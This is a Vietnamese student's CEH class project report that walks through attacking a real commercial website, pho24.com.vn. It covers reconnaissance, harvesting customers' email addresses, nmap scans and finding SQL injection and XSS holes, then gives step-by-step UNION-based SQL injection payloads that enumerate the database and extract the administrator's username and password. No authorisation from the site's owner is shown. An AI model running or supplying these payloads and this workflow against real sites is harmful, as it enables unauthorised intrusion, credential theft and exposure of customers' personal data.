Khai thác lỗi bảo mật của trang web pho24.com.vn

Đồ án hết môn lớp CEH
Khai giảng ngày 5/4/2012 – Tối 3,5,7
SVTT: Đặng Lê Nam

GVHD:Nguyễn Hồ Phi Long

Trang 1


Khai thác lỗi bảo mật của trang web pho24.com.vn

MỤC LỤC
Chương 1: Tìm hiểu về đặc điểm và tính chất của trang web victim............................................................ 3
Footprinting: ................................................................................................................................... 3

I.
1.

Tìm hiểu về domain pho24.com.vn.............................................................................................. 3

2.

Tìm hiểu về các domain sử dụng chung 1 hosting với pho24.com.vn ....................................... 5

3.

Tìm hiểu về con đường dẫn hacker tấn công máy victim ........................................................... 5

4.

Khai thác email khách hàng và email user sử dụng web victim ................................................ 7

II.

Scanning: ..................................................................................................................................... 7

1.

Tìm hiểu về các port mở trên máy chủ pho24.com.vn ................................................................ 7

2.

Tìm hiểu về thông tin hệ điều hành sử dụng của máy chủ web................................................. 8

3.

Tìm hiểu về webservice đang hoạt động trên máy chủ web ....................................................... 9

III.

Tìm hiểu về lỗi Web Application trên pho24.com.vn .............................................................. 9

1.

Lỗi Blind SQL Injection............................................................................................................... 9

2.

Lỗi XSS ....................................................................................................................................... 11


Chương 2: Tấn công và khai thác trang web victim bằng SQL Injection ................................................... 12
Tấn công và khai thác trang web bằng thủ công: ...................................................................... 12

I.
1.

Trang web truy cập bình thường với pid =35............................................................................ 12

2.

Trang web bị lỗi với pid =35’ ..................................................................................................... 12

3.

Tìm số column để tiến hành khai thác ...................................................................................... 13

4.

Tìm các column gây ra lỗi: ....................................................................................................... 14

5.

Tìm tên database (Cơ sỡ dữ liệu) của website ........................................................................... 15

6.

Tìm tên các bảng trong cơ sỡ dữ liệu ........................................................................................ 15

7.


Tìm các cột (trường dữ liệu) của bảng admin .......................................................................... 16

8.

Tìm username và password của người quản trị........................................................................ 16

II.

Tấn công và khai thác trang web victim bằng công cụ Havij ............................................... 18

GVHD:Nguyễn Hồ Phi Long

Trang 2


Khai thác lỗi bảo mật của trang web pho24.com.vn

Chương 1: Tìm hiểu về đặc điểm và tính chất của trang web victim
I.

Footprinting:
1. Tìm hiểu về domain pho24.com.vn
- Ở đây ta nhận thấy pho24.com.vn sử dụng domain .vn vì vậy ta vào
vnnic.vn để truy vết sở hữu tên miền này

-

Ta sử dụng command promt của windows để truy vết các máy chủ
victim


GVHD:Nguyễn Hồ Phi Long

Trang 3


Khai thác lỗi bảo mật của trang web pho24.com.vn

 Ta thấy khi ta kết nối với dns server của pho24.com.vn (bằng lệnh ls
–d pho24.com.vn) thì không thể truy xuất các zone của các máy đặt
trên dns đó về được vì vậy ta chỉ có thể dò tìm các máy này trên
google hoặc mò giống máy ftp được như trên (ftp.pho24.com.vn) mà
thôi

GVHD:Nguyễn Hồ Phi Long

Trang 4


Khai thác lỗi bảo mật của trang web pho24.com.vn
 Ta thấy mail server và ftp server cùng nằm trên 1 địa chỉ
221.132.37.135 là máy ns.pho24.com.vn và cũng là máy
ns1.lisdns.net của nhà cung cấp FPT, đặc biệt là máy này khác máy
chủ làm web 221.132.37.133
2. Tìm hiểu về các domain sử dụng chung 1 hosting với pho24.com.vn

 Ta thấy có 33 domains sử dụng chung hosting với pho24.com.vn vậy
ta kết luận pho24.com.vn sử dụng shared host
3. Tìm hiểu về con đường dẫn hacker tấn công máy victim
- Sử dụng công cụ trace route trên internet ta thấy qua 15 hops count

hacker (206.123.64.42) mới đến được máy victim (221.132.37.133)

GVHD:Nguyễn Hồ Phi Long

Trang 5


Khai thác lỗi bảo mật của trang web pho24.com.vn

-

Sử dụng phần mềm neotrace để thấy con đường đi đến máy victim rõ
ràng hơn

GVHD:Nguyễn Hồ Phi Long

Trang 6


Khai thác lỗi bảo mật của trang web pho24.com.vn
4. Khai thác email khách hàng và email user sử dụng web victim
- Sử dụng chương trình 1st Email Address Spider 2006 giúp ta tìm thông
tin email của khách hàng và user sử dụng trang web pho24.com.vn một
cách nhanh chóng

II.

Scanning:
1. Tìm hiểu về các port mở trên máy chủ pho24.com.vn


Nmap –sS –PN pho24.com.vn

GVHD:Nguyễn Hồ Phi Long

Trang 7


Khai thác lỗi bảo mật của trang web pho24.com.vn

2. Tìm hiểu về thông tin hệ điều hành sử dụng của máy chủ web
Nmap –0 – p 80 –PN pho24.com.vn

GVHD:Nguyễn Hồ Phi Long

Trang 8


Khai thác lỗi bảo mật của trang web pho24.com.vn

3. Tìm hiểu về webservice đang hoạt động trên máy chủ web

Nmap –sV –p 80 –PN pho24.com.vn

III.

Tìm hiểu về lỗi Web Application trên pho24.com.vn
1. Lỗi Blind SQL Injection
- Ta thấy có 4 tham số để khai thác lỗi sql injection là city, district,
php_id, pid


GVHD:Nguyễn Hồ Phi Long

Trang 9


Khai thác lỗi bảo mật của trang web pho24.com.vn

-

Ta sử dung phần mềm acunetix Web Vulnerability Scanner vừa có thể
quét lỗi và test lỗi trực tiếp trên phần mềm
Ví dụ: ở đây ta khai thác lỗi Blind SQL injection ở tham số city

GVHD:Nguyễn Hồ Phi Long

Trang 10


Khai thác lỗi bảo mật của trang web pho24.com.vn
2. Lỗi XSS
- Ta thấy lỗi XSS ở tham số language
- Ta có thể chèn script ngay trên trang web

GVHD:Nguyễn Hồ Phi Long

Trang 11


Khai thác lỗi bảo mật của trang web pho24.com.vn
Chương 2: Tấn công và khai thác trang web victim bằng SQL Injection

I.

Tấn công và khai thác trang web bằng thủ công:
1. Trang web truy cập bình thường với pid =35

2. Trang web bị lỗi với pid =35’
- Lỗi inject tại biến pid
- Trang web không thấy được nội dung

GVHD:Nguyễn Hồ Phi Long

Trang 12


Khai thác lỗi bảo mật của trang web pho24.com.vn

3. Tìm số column để tiến hành khai thác
- Sử dụng toán tử order by { số column tăng dần ) để đoán column
- Ta thấy column 14 thì trang web bắt đầu không thấy nội dung nữa

-

Giảm column còn 13 thì trang web trờ lại bình thường
 Giá trị columns chúng ta sẽ khai thác là 13

GVHD:Nguyễn Hồ Phi Long

Trang 13



Khai thác lỗi bảo mật của trang web pho24.com.vn

4. Tìm các column gây ra lỗi:
- Cú pháp câu lệnh:

/>0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--

GVHD:Nguyễn Hồ Phi Long

Trang 14


Khai thác lỗi bảo mật của trang web pho24.com.vn
5. Tìm tên database (Cơ sỡ dữ liệu) của website
- Cú pháp câu lệnh:

/>UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11,12,13 from
information_schema.schemata--

6. Tìm tên các bảng trong cơ sỡ dữ liệu
- Cú pháp câu lệnh:

/>UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12,13 from
information_schema.tables where table_schema=database()--

GVHD:Nguyễn Hồ Phi Long

Trang 15



Khai thác lỗi bảo mật của trang web pho24.com.vn

7. Tìm các cột (trường dữ liệu) của bảng admin
- Cú pháp câu lệnh:

/>UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13 from
information_schema.columns where table_name=0x61646d696e--

8. Tìm username và password của người quản trị
- Cú pháp câu lệnh:

GVHD:Nguyễn Hồ Phi Long

Trang 16


Khai thác lỗi bảo mật của trang web pho24.com.vn

/>UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(username),11,group_concat(password),13 from
admin--

GVHD:Nguyễn Hồ Phi Long

Trang 17


Khai thác lỗi bảo mật của trang web pho24.com.vn

II.


Tấn công và khai thác trang web victim bằng công cụ Havij

GVHD:Nguyễn Hồ Phi Long

Trang 18